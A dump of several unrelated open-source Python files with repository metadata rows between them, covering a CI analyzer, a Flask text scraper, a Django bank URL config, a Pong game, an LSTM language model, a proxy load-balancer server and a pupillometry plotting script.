parser.add_argument('-v', '--verbose', action='store_true', default=False,
help='Provide more information in console')
parser.add_argument('-d', '--start-date', type=start_date_type,
help='Date to start collecting data from, if none is provided, the latest three months are '
'collected. Date should be formatted as YYYY-MM-DD')
# GENERAL FUNCTIONS
def analyze_repo(
repo,
anti_patterns=None,
detect_only=False,
use_cache=True,
create_cache=True,
verbose=False,
out_dir=None,
start_date=None,
to_date=None
):
start = time()
print(f"===============\nStarting analysis on '{repo.path}'\n===============")
print("Detecting CI...", end='') if verbose else None
detected = detect_ci_tools(repo, use_cache, create_cache)
print(f"Done ({round(time() - start, 2)}s)") if verbose else None
if detect_only:
print("Detected CI tools: ", detected)
print(f"==== DONE, TOOK {round(time() - start, 2)}s ====\n")
return detected
print("Collecting builds...", end='') if verbose else None
builds = collect_builds(repo, use_cache, create_cache, start_date, to_date)
print(f"Done ({round(time() - start, 2)}s)") if verbose else None
print("Gathering branch information...", end='') if verbose else None
branch_info = repo.branch_information(use_cache, create_cache)
default_branch = repo.default_branch
print(f"Done ({round(time() - start, 2)}s)") if verbose else None
print("Analyzing anti-patterns...", end='') if verbose else None
anti_patterns = find_anti_patterns(builds, branch_info, default_branch, restriction=anti_patterns)
print(f"Done ({round(time() - start, 2)}s)") if verbose else None
print("Creating output files...", end='') if verbose else None
if out_dir:
create_images(anti_patterns, repo, out_dir)
create_json(anti_patterns, repo, out_dir)
create_text_files(anti_patterns, repo, out_dir)
else:
create_images(anti_patterns, repo)
create_json(anti_patterns, repo)
create_text_files(anti_patterns, repo)
print(f"Done ({round(time() - start, 2)}s)") if verbose else None
print(f"==== DONE, TOOK {round(time() - start, 2)}s ====\n")
return detected, anti_patterns, branch_info, default_branch
| FreekDS/CIAN | analyzer/__init__.py | __init__.py | py | 5,131 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "analyzer.config.PROVIDERS",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "argparse.ArgumentTypeError",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "analyzer.config.PROVIDERS",
"line_number": 34,
"usage_type": "name"
},
{
"ap... |
12538131223 | from flask import (
Flask,
render_template,
request
)
from bs4 import BeautifulSoup
import requests
from urllib.request import Request, urlopen
from flask_cors import CORS
from textblob import TextBlob
# Create the application instance
app = Flask(__name__, template_folder="templates")
CORS(app)
# Create a URL route in our application for "/"
@app.route('/')
def home():
url = request.args.get('url')
sauce = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
soup =BeautifulSoup(urlopen(sauce).read(), 'html.parser')
result = ""
for paragraph in soup.find_all('p'):
result += paragraph.text
print("request to " + url)
return result
# If we're running in stand alone mode, run the application
if __name__ == '__main__':
app.run(debug=True) | marynashapoval/text_analysis_bachelor_work | tryScript.py | tryScript.py | py | 831 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "flask.Flask",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "flask_cors.CORS",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "flask.request.args.get",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "flask.request.args... |
4675931038 | from django.contrib import admin
from django.urls import path
from Bank import views
urlpatterns = [
path("", views.homepage, name='homepage_bank'),
path("feedback", views.feedback, name='feedback'),
path("SignUp", views.SignUp, name='SignUp'),
path("LogIn", views.LogIn, name='LogIn'),
path('LogIn-Active', views.login_active, name='login-active'),
path("LogIn-Active/actions", views.deposit, name='deposit'),
path("LogIn-Active/actions", views.withdraw, name='withdraw'),
path("LogIn-Active/actions", views.transfer, name='transfer'),
path("LogIn-Active/register", views.register, name='register'),
] | paandrei/Django_Project | Bank/urls.py | urls.py | py | 655 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.urls.path",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "Bank.views.homepage",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "Bank.views",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "django.urls.path",
... |
16618551872 | import pygame, random, sys
class Ball:
def __init__(self):
self.x = 380.0
self.y = 280.0
self.radius = 20
self.velocityX = 0.0
self.velocityY = 0.0
self.speed = 150.0
def draw(self, window):
pygame.draw.circle(window, (255, 255, 255), (int(self.x), int(self.y)), self.radius, 0)
def update(self, deltaTime, player):
if self.velocityX == 0 and self.velocityY == 0:
direction = random.randint(0, 3)
if direction == 1:
self.velocityX = -self.speed
self.velocityY = self.speed
if direction == 2:
self.velocityY = self.speed
if direction == 3:
self.velocityX = self.speed
self.velocityY = self.speed
self._check_bounds(player)
self.x += self.velocityX*deltaTime
self.y += self.velocityY*deltaTime
if (self.y+self.radius) >= 600:
print("You lost!")
pygame.quit()
sys.exit()
def _check_bounds(self, player):
if (self.x-self.radius) <= 0:
self.velocityX = -self.velocityX
if (self.x+self.radius) >= 800:
self.velocityX = -self.velocityX
if (self.y-self.radius) <= 0:
self.velocityY = -self.velocityY
if (self.y+self.radius) >= 560:
if ((self.x+self.radius) >= player.x) and ((self.x-self.radius) <= player.x+150):
self.velocityY = -self.velocityY
| mbedded-mike/Pong | ball.py | ball.py | py | 1,522 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pygame.draw.circle",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pygame.draw",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "random.randint",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "pygame.quit",
... |
18026113140 | # coding: utf-8
## Author: Jiayi Chen
## Time-stamp: 11/26/2018
import argparse
import time
import math
import os
import torch
import torch.nn as nn
import torch.onnx
parser = argparse.ArgumentParser(description='PyTorch Wikitext-2 RNN/LSTM Language Model')
parser.add_argument('--data', type=str, default='trn-wiki.txt',
help='location of the data corpus')
parser.add_argument('--model', type=str, default='LSTM',
help='type of recurrent net (RNN_TANH, RNN_RELU, LSTM, GRU)')
parser.add_argument('--emsize', type=int, default=32,
help='size of word embeddings')
parser.add_argument('--nhid', type=int, default=32,
help='number of hidden units per layer')
parser.add_argument('--nlayers', type=int, default=1,
help='number of layers')
parser.add_argument('--lr', type=float, default=0.7,
help='initial learning rate')
parser.add_argument('--clip', type=float, default=3,
help='gradient clipping')
parser.add_argument('--epochs', type=int, default=50,
help='upper epoch limit')
parser.add_argument('--batch_size', type=int, default=16, metavar='N',
help='batch size')
parser.add_argument('--bptt', type=int, default=35,
help='sequence length')
parser.add_argument('--dropout', type=float, default=0.0,
help='dropout applied to layers (0 = no dropout)')
parser.add_argument('--tied', action='store_true',
help='tie the word embedding and softmax weights')
parser.add_argument('--seed', type=int, default=1111,
help='random seed')
parser.add_argument('--cuda', action='store_true',
help='use CUDA')
parser.add_argument('--log-interval', type=int, default=200, metavar='N',
help='report interval')
parser.add_argument('--save', type=str, default='model.pt',
help='path to save the final model')
parser.add_argument('--onnx-export', type=str, default='',
help='path to export the final model in onnx format')
args = parser.parse_args()
class Dictionary(object):
def __init__(self):
self.word2idx = {}
self.idx2word = []
def add_word(self, word):
if word not in self.word2idx:
self.idx2word.append(word)
self.word2idx[word] = len(self.idx2word) - 1
return self.word2idx[word]
def __len__(self):
return len(self.idx2word)
class Corpus(object):
def __init__(self, path):
self.dictionary = Dictionary()
# self.train = self.tokenize(os.path.join(path, 'train.txt'))
# self.valid = self.tokenize(os.path.join(path, 'valid.txt'))
# self.test = self.tokenize(os.path.join(path, 'test.txt'))
self.train = self.tokenize('trn-wiki.txt')
self.dev = self.tokenize('dev-wiki.txt')
self.test = self.tokenize('tst-wiki.txt')
def tokenize(self, path):
"""Tokenizes a text file."""
assert os.path.exists(path)
# Add words to the dictionary
with open(path, 'r', encoding="utf8") as f:
tokens = 0
for line in f:
words = line.split() + ['<eos>']
tokens += len(words)
for word in words:
self.dictionary.add_word(word)
# Tokenize file content
with open(path, 'r', encoding="utf8") as f:
ids = torch.LongTensor(tokens)
token = 0
for line in f:
words = line.split() + ['<eos>']
for word in words:
ids[token] = self.dictionary.word2idx[word]
token += 1
return ids
class RNNModel(nn.Module):
"""Container module with an encoder, a recurrent module, and a decoder."""
def __init__(self, rnn_type, ntoken, ninp, nhid, nlayers, dropout=0.5, tie_weights=False):
super(RNNModel, self).__init__()
self.drop = nn.Dropout(dropout)
self.encoder = nn.Embedding(ntoken, ninp)
self.rnn = getattr(nn, 'LSTM')(ninp, nhid, nlayers, dropout=dropout)
self.decoder = nn.Linear(nhid, ntoken)
# Optionally tie weights as in:
# "Using the Output Embedding to Improve Language Models" (Press & Wolf 2016)
# https://arxiv.org/abs/1608.05859
# and
# "Tying Word Vectors and Word Classifiers: A Loss Framework for Language Modeling" (Inan et al. 2016)
# https://arxiv.org/abs/1611.01462
if tie_weights:
if nhid != ninp:
raise ValueError('When using the tied flag, nhid must be equal to emsize')
self.decoder.weight = self.encoder.weight
self.rnn_type = rnn_type
self.nhid = nhid
self.nlayers = nlayers
def forward(self, input, hidden):
emb = self.drop(self.encoder(input))#input(seq, batch) emb(seq, batch, featuresz)
output, hidden = self.rnn(emb, hidden)# hidden(1, batch, featuresz) output(seq, batch, featuresz)
output = self.drop(output)
decoded = self.decoder(output.view(output.size(0)*output.size(1), output.size(2)))# decoded(seq*batch, featuresz)
return decoded.view(output.size(0), output.size(1), decoded.size(1)), hidden# decoded(seq, batch, V)
def init_hidden(self, bsz):
weight = next(self.parameters())
if self.rnn_type == 'LSTM':
return (weight.new_zeros(self.nlayers, bsz, self.nhid),
weight.new_zeros(self.nlayers, bsz, self.nhid))
else:
return weight.new_zeros(self.nlayers, bsz, self.nhid)
def batchify(data, bsz):
# Work out how cleanly we can divide the dataset into bsz parts.
nbatch = data.size(0) // bsz
# Trim off any extra elements that wouldn't cleanly fit (remainders).
data = data.narrow(0, 0, nbatch * bsz)
# Evenly divide the data across the bsz batches.
data = data.view(bsz, -1).t().contiguous()
return data.to(device)
def repackage_hidden(h):
"""Wraps hidden states in new Tensors, to detach them from their history."""
if isinstance(h, torch.Tensor):
return h.detach()
else:
return tuple(repackage_hidden(v) for v in h)
def get_batch(source, i):
seq_len = min(args.bptt, len(source) - 1 - i)
data = source[i:i+seq_len]# [ seq , batchsz ]
target = source[i+1:i+1+seq_len].view(-1)# batchsz * seq
return data, target
def evaluate(data_source):
# Turn on evaluation mode which disables dropout.
model.eval()
total_loss = 0.
ntokens = len(corpus.dictionary)
hidden = model.init_hidden(eval_batch_size)
with torch.no_grad():
for i in range(0, data_source.size(0) - 1, args.bptt):
data, targets = get_batch(data_source, i)
output, hidden = model(data, hidden)
output_flat = output.view(-1, ntokens)#p(wn|wn−1,…,w1,START)=softmax(Whn−1+b), where W is the weight matrix, hn−1 is the last hidden state from RNN and b is the bias term.
total_loss += len(data) * criterion(output_flat, targets).item()
hidden = repackage_hidden(hidden)
return total_loss / (len(data_source) - 1)
def train():
# Turn on training mode which enables dropout.
model.train()
total_loss = 0.
start_time = time.time()
ntokens = len(corpus.dictionary)
hidden = model.init_hidden(args.batch_size)
for batch, i in enumerate(range(0, train_data.size(0) - 1, args.bptt)):
data, targets = get_batch(train_data, i)
# Starting each batch, we detach the hidden state from how it was previously produced.
# If we didn't, the model would try backpropagating all the way to start of the dataset.
hidden = repackage_hidden(hidden)
model.zero_grad()
output, hidden = model(data, hidden)
loss = criterion(output.view(-1, ntokens), targets)
loss.backward()# call BBTT
optimizer.step()
# `clip_grad_norm` helps prevent the exploding gradient problem in RNNs / LSTMs.
torch.nn.utils.clip_grad_norm_(model.parameters(), args.clip)
for p in model.parameters():
p.data.add_(-lr, p.grad.data)
total_loss += loss.item()
if batch % args.log_interval == 0 and batch > 0:
cur_loss = total_loss / args.log_interval
elapsed = time.time() - start_time
print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:02.2f} | '
' cur_avg_loss {:5.2f} | current_perplexity {:8.2f}'.format(
epoch, batch, len(train_data) // args.bptt, lr,
cur_loss, math.exp(cur_loss)))
total_loss = 0
start_time = time.time()
def export_onnx(path, batch_size, seq_len):
print('The model is also exported in ONNX format at {}'.
format(os.path.realpath(args.onnx_export)))
model.eval()
dummy_input = torch.LongTensor(seq_len * batch_size).zero_().view(-1, batch_size).to(device)
hidden = model.init_hidden(batch_size)
torch.onnx.export(model, (dummy_input, hidden), path)
# Set the random seed manually for reproducibility.
torch.manual_seed(args.seed)
if torch.cuda.is_available():
if not args.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
device = torch.device("cuda" if args.cuda else "cpu")
###############################################################################
# Load data
###############################################################################
corpus = Corpus(args.data)
eval_batch_size = args.batch_size
train_data = batchify(corpus.train, args.batch_size)
dev_data = batchify(corpus.dev, eval_batch_size)
test_data = batchify(corpus.test, eval_batch_size)
###############################################################################
# Build the model
###############################################################################
ntokens = len(corpus.dictionary)
model = RNNModel(args.model, ntokens, args.emsize, args.nhid, args.nlayers, args.dropout, args.tied).to(device)
optimizer = torch.optim.SGD(model.parameters(), lr=args.lr)
criterion = nn.CrossEntropyLoss()# no need softmax
###############################################################################
# Training code
###############################################################################
# Loop over epochs.
lr = args.lr
best_val_loss = None
# At any point you can hit Ctrl + C to break out of training early.
try:
for epoch in range(1, args.epochs+1):
epoch_start_time = time.time()
train()
trn_ppl = evaluate(train_data)
dev_ppl = evaluate(dev_data)
print('End of epoch {:3d} | Perplexity on training data is {:8.2f}'.format(epoch, math.exp(trn_ppl)))
print('End of epoch {:3d} | Perplexity on development data is {:8.2f}\n'.format(epoch, math.exp(dev_ppl)))
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or dev_ppl < best_val_loss:
with open(args.save, 'wb') as f:
torch.save(model, f)
best_val_loss = dev_ppl
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
lr /= 4.0
except KeyboardInterrupt:
print('Exiting from training early')
# Load the best saved model.
with open(args.save, 'rb') as f:
model = torch.load(f)
# after load the rnn params are not a continuous chunk of memory
# this makes them a continuous chunk, and will speed up forward pass
model.rnn.flatten_parameters()
# Run on test data.
dev_loss = evaluate(dev_data)
print('| End of training | test loss {:5.2f} | test ppl {:8.2f}'.format(
dev_loss, math.exp(dev_loss)))
if len(args.onnx_export) > 0:
# Export the model in ONNX format.
export_onnx(args.onnx_export, batch_size=1, seq_len=args.bptt)
| jia-yi-chen/Natural-Language-Processing-all | language_modeling/main-minibatch-rnnlm.py | main-minibatch-rnnlm.py | py | 12,033 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 75,
"usage_type": "attribute"
},
{
"api_name": "torch.LongTensor"... |
850231959 | import datetime as dt
from peewee import DataError
from playhouse.postgres_ext import DateTimeTZField
class DateTimeTzField(DateTimeTZField):
def db_value(self, value):
if value is not None:
if value.tzinfo is None:
raise DataError(f'Cannot use naive datetime "{value}" in DateTimeTzField')
value = value.astimezone(dt.timezone.utc).replace(tzinfo=None)
return super(DateTimeTzField, self).db_value(value)
def python_value(self, value):
value = super(DateTimeTzField, self).python_value(value)
if value is not None:
value = value.replace(tzinfo=dt.timezone.utc)
return value | malikfassi/SayMyName | api/common/models/DateTimeTZField.py | DateTimeTZField.py | py | 677 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "playhouse.postgres_ext.DateTimeTZField",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "peewee.DataError",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "datetime.timezone",
"line_number": 11,
"usage_type": "attribute"
},
{
"api... |
828214309 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu May 24 23:37:57 2018
@author: pt
"""
for i in range(1,10) :
print(str(i) + '\r')
from IPython.display import clear_output
for f in range(10):
clear_output(wait=True)
print(f)
time.sleep(.1)
import sys
import time
for f in range(10):
#delete "\r" to append instead of overwrite
sys.stdout.write("\r" + str(f))
sys.stdout.flush()
time.sleep(.1) | thegreatskywalker/my_deep_learning | untitled3.py | untitled3.py | py | 466 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "IPython.display.clear_output",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "sys.stdout.write",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "sys.stdout",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "sys.std... |
41676958983 | import time
import asyncio
import logging
from config import CONFIG
from proxy import get_proxy
from errors import (
BadStatusLine, BadResponseError, ErrorOnStream,
NoProxyError, ProxyRecvError, ProxyTimeoutError)
from utils import parse_headers, parse_status_line
logger = logging.getLogger(__name__)
request_logger = logging.getLogger('proxy_request')
global_requests = []
CONNECTED = b'HTTP/1.1 200 Connection established\r\n\r\n'
class Server:
"""Server distributes incoming requests to its pool of proxies.
Each instance of this calss is a 'pool' which has proxies.
TODOs:
- The pool should at all times have calculated stats about the proxies in its pool
"""
def __init__(self, host, port, timeout=30, loop=None):
self.host = host
self.port = int(port)
self._loop = loop or asyncio.get_event_loop()
self._timeout = timeout
self._server = None
self._connections = {}
def start(self):
srv = asyncio.start_server(
self._accept, host=self.host, port=self.port, loop=self._loop)
self._server = self._loop.run_until_complete(srv)
logger.info('Listening established on {0}'.format(
self._server.sockets[0].getsockname()))
def stop(self):
if not self._server:
return
for conn in self._connections:
if not conn.done():
conn.cancel()
self._server.close()
if not self._loop.is_running():
self._loop.run_until_complete(self._server.wait_closed())
# Time to close the running futures in self._connections
self._loop.run_until_complete(asyncio.sleep(0.5))
self._server = None
self._loop.stop()
logger.info('Server is stopped')
def _accept(self, client_reader, client_writer):
def _on_completion(f):
reader, writer = self._connections.pop(f)
writer.close()
logger.debug('client: %d; closed' % id(client_reader))
try:
exc = f.exception()
except asyncio.CancelledError:
logger.error('CancelledError in server._handle:_on_completion')
exc = None
if exc:
if isinstance(exc, NoProxyError):
self.stop()
else:
raise exc
f = asyncio.ensure_future(self._handle(client_reader, client_writer))
f.add_done_callback(_on_completion)
self._connections[f] = (client_reader, client_writer)
async def _handle(self, client_reader, client_writer):
logger.debug(f"Accepted connection from {client_writer.get_extra_info('peername')}")
time_of_request = int(time.time()) # The time the request was requested
request, headers = await self._parse_request(client_reader)
scheme = self._identify_scheme(headers)
client = id(client_reader)
error = None
stime = 0
proxy, pool = await get_proxy(headers['Host'], self.port)
proto = self._choice_proto(proxy, scheme)
logger.debug(f'client: {client}; request: {request}; headers: {headers}; '
f'scheme: {scheme}; proxy: {proxy}; proto: {proto}')
try:
await proxy.connect()
if proto in ('CONNECT:80', 'SOCKS4', 'SOCKS5'):
if scheme == 'HTTPS' and proto in ('SOCKS4', 'SOCKS5'):
client_writer.write(CONNECTED)
await client_writer.drain()
else: # HTTP
await proxy.send(request)
else: # proto: HTTP & HTTPS
await proxy.send(request)
stime = time.time()
stream = [asyncio.ensure_future(self._stream(reader=client_reader, writer=proxy.writer)),
asyncio.ensure_future(self._stream(reader=proxy.reader, writer=client_writer, scheme=scheme))
]
await asyncio.gather(*stream, loop=self._loop)
except asyncio.CancelledError:
logger.error('Cancelled in server._handle')
error = 'Cancelled in server._handle'
except ErrorOnStream as e:
logger.error(f'client: {client}; EOF: {client_reader.at_eof()}; Error: {e}')
for task in stream:
if not task.done():
task.cancel()
if client_reader.at_eof() and 'Timeout' in repr(e):
# Proxy may not be able to receive EOF and will raise a
# TimeoutError, but all the data has already successfully
# returned, so do not consider this error of proxy
error = 'TimeoutError'
if scheme == 'HTTPS': # SSL Handshake probably failed
error = 'SSL Error'
except ProxyTimeoutError:
logger.error("Proxy timeout")
error = 'Proxy Timeout'
# TODO: Send client a 408 status code
except Exception as e:
# Catch anything that falls through
logger.exception("Catch all in server")
error = repr(e)
finally:
proxy.log(request.decode(), stime)
# At this point, the client has already disconnected and now the stats can be processed and saved
try:
if CONFIG.get('Server', {}).get('Log_Requests', True):
proxy_url = f'{proxy.host}:{proxy.port}'
path = None
# Can get path for http requests, but not for https
if '/' in headers.get('Path', ''):
path = '/' + headers.get('Path', '').split('/')[-1]
try:
status_code = parse_status_line(stream[1].result().split(b'\r\n', 1)[0].decode()).get('Status')
except Exception as e:
logger.warning(f"Issue saving status code: proxy={proxy_url}; host={headers.get('Host')}")
status_code = None
if error is None:
error = repr(e)
try:
proxy_bandwidth_up = len(stream[0].result()) + proxy.stats.get('bandwidth_up', 0)
proxy_bandwidth_down = len(stream[1].result()) + proxy.stats.get('bandwidth_down', 0)
except Exception:
# Happens if something goes wrong with the connection
logger.warning(f"Issue saving bandwidth: proxy={proxy_url}; host={headers.get('Host')}")
proxy_bandwidth_up = None
proxy_bandwidth_down = None
request_log = {'host': headers.get('Host'),
'proxy': proxy_url,
'path': path,
'scheme': scheme,
'bw_up': proxy_bandwidth_up,
'bw_down': proxy_bandwidth_down,
'status_code': status_code,
'error': error,
'total_time': proxy.stats['total_time'],
'ts': time_of_request,
'pool_name': pool,
'proxy_port': self.port
}
request_logger.info('Request made', extra=request_log)
except Exception:
logger.exception("Failed to save request data")
proxy.close()
async def _parse_request(self, reader, length=65536):
request = await reader.read(length)
headers = parse_headers(request)
if headers['Method'] == 'POST' and request.endswith(b'\r\n\r\n'):
# For aiohttp. POST data returns on second reading
request += await reader.read(length)
return request, headers
def _identify_scheme(self, headers):
if headers['Method'] == 'CONNECT':
return 'HTTPS'
else:
return 'HTTP'
def _choice_proto(self, proxy, scheme):
if scheme == 'HTTP':
if 'CONNECT:80' in proxy.types:
proto = 'CONNECT:80'
else:
relevant = ({'HTTP', 'CONNECT:80', 'SOCKS4', 'SOCKS5'} &
proxy.types)
proto = relevant.pop()
else: # HTTPS
relevant = {'HTTPS', 'SOCKS4', 'SOCKS5'} & proxy.types
proto = relevant.pop()
return proto
async def _stream(self, reader, writer, length=65536, scheme=None):
checked = False
total_data = b''
try:
while not reader.at_eof():
data = await asyncio.wait_for(reader.read(length), self._timeout)
if not data:
writer.close()
break
elif scheme and not checked:
self._check_response(data, scheme)
checked = True
total_data += data
writer.write(data)
await writer.drain()
except (asyncio.TimeoutError, ConnectionResetError, OSError,
ProxyRecvError, BadResponseError) as e:
raise ErrorOnStream(e)
return total_data
def _check_response(self, data, scheme):
if scheme.startswith('HTTP'):
# Check both HTTP & HTTPS requests
line = data.split(b'\r\n', 1)[0].decode()
try:
parse_status_line(line)
except BadStatusLine:
raise BadResponseError
| ScraperX/proxy-load-balancer | server.py | server.py | py | 9,751 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "logging.getLogger",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "asyncio.get_event_loop",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "asyncio.st... |
3314836701 | # -*- coding: utf-8 -*-
"""
===============================================================================
Script 'fig-pupil-voc'
===============================================================================
This script plots pupil size & significance tests for the vocoder experiment.
"""
# @author: Dan McCloy (drmccloy@uw.edu)
# Created on Fri Sep 25 11:15:34 2015
# License: BSD (3-clause)
import yaml
import os.path as op
import numpy as np
import matplotlib.pyplot as plt
from pandas import DataFrame
from matplotlib.colors import colorConverter as cc
from scipy.stats import distributions
from mne.stats import spatio_temporal_cluster_1samp_test, ttest_1samp_no_p
from convenience_functions import (box_off, use_font, tick_label_size,
hatch_between, read_data)
from functools import partial
# mostly rcParams stuff
plt.ioff()
use_font('source')
tick_label_size(10)
# flags
plot_stderr = True
plot_signif = True
show_pval = False
savefig = True
use_deconv = True
only_perfect = False
# file I/O
work_dir = '..'
out_dir = op.join(work_dir, 'results')
voc_file = op.join(work_dir, 'voc_data.npz')
perfect_filename = '-perfect' if only_perfect else ''
vv = np.load(voc_file)
data_deconv, t_fit, subjects = vv['fits_struct'], vv['t_fit'], vv['subjects']
data_zscore, fs, kernel = vv['zscores_struct'], vv['fs'], vv['kernel']
'''
data_zscore.shape
16, 40, 2, 2, 2, 6550
subj trials 200/600gap maint/switch 10/20chan samples
(similar for data_deconv, with fewer samples along last dimension)
'''
# params
stim_times = np.array([0, 0.5, 1.5, 2.0, 2.5, 3.0]) # gap not included (yet)
stim_dur = 0.47 # really 0.5, but leave a tiny gap to visually distinguish
t_kernel_peak = np.where(kernel == kernel.max())[0][0] / float(fs)
t_min, t_max = -0.5, 6. - t_kernel_peak
t_zs = t_min + np.arange(data_zscore.shape[-1]) / float(fs)
stat_fun = partial(ttest_1samp_no_p, sigma=1e-3)
# colors
cue, msk, blu, red = '0.75', '0.75', '#332288', '#cc6677'
signifcol = '0.9'
axiscol = '0.8'
tickcol = '0.8'
axislabcol = '0.3'
ticklabcol = '0.5'
# get behavioral data
if only_perfect:
path = op.join(work_dir, 'data-behavioral', 'voc-behdata-longform.tsv')
beh_data = read_data(path, parse_presses=False)
beh_data['perfect'] = np.logical_and(beh_data['misses'] == 0,
beh_data['false_alarms'] == 0)
cols = ['subj', 'gap_len', 'attn', 'voc_chan']
beh_data = beh_data.sort_values(by=cols)
dims = [len(beh_data[c].unique()) for c in cols]
dims.insert(1, -1)
perfect_ix = beh_data['perfect'].reshape(dims)
voc_10_ix = (beh_data['voc_chan'] == 10).reshape(dims)
voc_20_ix = (beh_data['voc_chan'] == 20).reshape(dims)
gap_200_ix = (beh_data['gap_len'] == 'short').reshape(dims)
gap_600_ix = (beh_data['gap_len'] == 'long').reshape(dims)
maint_ix = (beh_data['attn'] == 'maint.').reshape(dims)
switch_ix = (beh_data['attn'] == 'switch').reshape(dims)
# set up figure
fig, axs = plt.subplots(3, 1, figsize=(3, 6.5))
xlim = [t_min, t_max]
times = [t_fit] if use_deconv else [t_zs]
datas = [data_deconv] if use_deconv else [data_zscore]
for t, data in zip(times, datas):
# collapse across trials and experimental contrasts
# axis 1 is trials, 2 is gap dur, 3 is maint/switch, 4 is num voc channels
chan_10_vs_20 = np.nanmean(data, axis=(1, 2, 3))
gap_200_vs_600 = np.nanmean(data, axis=(1, 3, 4))
maint_vs_switch = np.nanmean(data, axis=(1, 2, 4))
# if only analyzing trials with perfect behavioral response, recompute
# the per-subject mean pupil resp. by condition using only those trials
# (a bit awkward because of potentially unequal counts)
if only_perfect:
# temporarily set these to infinite values (to check later that they
# got properly re-assigned)
chan_10_vs_20 = np.full_like(chan_10_vs_20, np.inf)
gap_200_vs_600 = np.full_like(gap_200_vs_600, np.inf)
maint_vs_switch = np.full_like(maint_vs_switch, np.inf)
# keep track of how many correct trials per condition
n_perfect_trials = dict()
for ix, subj in enumerate(subjects):
sj = np.zeros_like(perfect_ix)
sj[ix] = True
v10 = np.logical_and(perfect_ix, voc_10_ix)
v20 = np.logical_and(perfect_ix, voc_20_ix)
g2 = np.logical_and(perfect_ix, gap_200_ix)
g6 = np.logical_and(perfect_ix, gap_600_ix)
mn = np.logical_and(perfect_ix, maint_ix)
sw = np.logical_and(perfect_ix, switch_ix)
chan_10_vs_20[ix] = np.array([np.nanmean(data[sj & v10], axis=0),
np.nanmean(data[sj & v20], axis=0)])
gap_200_vs_600[ix] = np.array([np.nanmean(data[sj & g2], axis=0),
np.nanmean(data[sj & g6], axis=0)])
maint_vs_switch[ix] = np.array([np.nanmean(data[sj & mn], axis=0),
np.nanmean(data[sj & sw], axis=0)])
# bookkeeping for n_perfect_trials
conds = dict()
conds['voc'] = {10: np.logical_and(v10, sj).sum(),
20: np.logical_and(v20, sj).sum()}
conds['gap'] = {200: np.logical_and(g2, sj).sum(),
600: np.logical_and(g6, sj).sum()}
conds['attn'] = {'maint': np.logical_and(mn, sj).sum(),
'switch': np.logical_and(sw, sj).sum()}
n_perfect_trials[subj] = conds
assert np.all(np.isfinite(chan_10_vs_20))
assert np.all(np.isfinite(gap_200_vs_600))
assert np.all(np.isfinite(maint_vs_switch))
# axis limits
ymax = np.max(np.mean(np.nanmean(data, axis=1), axis=0)) # ceil
ymax = 10 ** np.trunc(np.log10(ymax)) if ymax < 1 else np.ceil(ymax)
ylim = [-0.6 * ymax, ymax]
# y values for stim timecourse diagram
stim_ymin = ymax * -0.45
stim_ymax = ymax * -0.3
for jj, (contrast, ax) in enumerate(zip([chan_10_vs_20, gap_200_vs_600,
maint_vs_switch], axs)):
# within-subject difference between conditions
contr_diff = (contrast[:, 1, :] - contrast[:, 0, :])[:, :, np.newaxis]
# collapse across subjects (only for plotting, not stats)
contr_std = np.std(contrast, axis=0) / np.sqrt(len(contrast) - 1)
contr_mean = np.mean(contrast, axis=0)
# vars for trial timecourse
gaps = [[0.6, 0.6], [0.2, 0.6], [0.6, 0.6]][jj]
labels = [['10 band', '20 band'], ['short gap', 'long gap'],
['maintain', 'switch']][jj]
colors = [[cue, cue], [cue, cue], [blu, red]][jj]
# plot curves
for kk, (cond, se) in enumerate(zip(contr_mean, contr_std)):
col = colors[kk]
linecol = [blu, red][kk]
tcol = cc.to_rgb(linecol) + (0.4,) # add alpha channel
tcol_hex = '#' + ''.join('%02x' % int(x * 255) for x in tcol)
zord = [2, 0][kk]
# plot standard error bands
if plot_stderr:
_ = ax.fill_between(t, cond-se, cond+se, color=tcol,
edgecolor='none', zorder=zord + 2)
# plot mean lines
_ = ax.plot(t, cond, color=linecol, linewidth=1.2, zorder=zord + 3)
# TRIAL TIMECOURSE
thk = 0.04 * ymax
off = 0.15 * ymax
loff = 0.01 * ymax
stim_y = [stim_ymin, stim_ymax][kk]
label_y = [stim_ymax, stim_ymax-off][kk]
# lines beneath stim boxes
if kk: # "switch" line
xnodes = (1, 2.5, 2.7, 4.4) if jj == 1 else (1, 2.5, 3.1, 4.4)
ynodes = (stim_y-loff, stim_y-loff,
stim_y-off+loff, stim_y-off+loff)
ax.plot(xnodes, ynodes, color=col, linewidth=1.,
linestyle='--', zorder=7)
else: # "maintain" line
ynodes = (stim_ymax+loff, stim_ymax+loff)
ax.plot((1, 4.4), ynodes, color=col, linewidth=1.,
solid_capstyle='butt', zorder=7)
